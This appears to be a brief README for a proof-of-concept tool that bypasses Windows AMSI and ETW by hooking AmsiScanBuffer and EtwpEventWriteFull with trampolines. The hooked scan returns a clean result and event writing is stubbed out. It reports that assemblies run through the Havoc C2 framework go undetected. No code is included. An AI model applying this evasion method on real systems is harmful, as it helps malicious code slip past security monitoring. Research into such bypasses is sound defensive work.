TrampoLatté is an AMSI & ETW bypass poc which utilizes trampolines to hook specific function and alter their execution behavior.
AmsiScanBuffer EtwpEventWriteFull
│ │
[13-byte jmp r10] [13-byte jmp r10]
│ │
┌──────┴──────┐ ┌─────┴─────┐
│ ProxyAmsi │ │ RetStub │
│ (saves ctx)│ │ (C3) │
└──────┬──────┘ └─────┬─────┘
▼ ▼
returns returns to caller
AmsiScanBuffer
=
AMSI_RESULT_CLEAN
- Started a custom ETW Consumer (right terminal) monitoring the .NET runtime
- Executing assemblies through Havoc doesn't trigger any detection (ETW)
This is just a POC and is not OPSEC safe.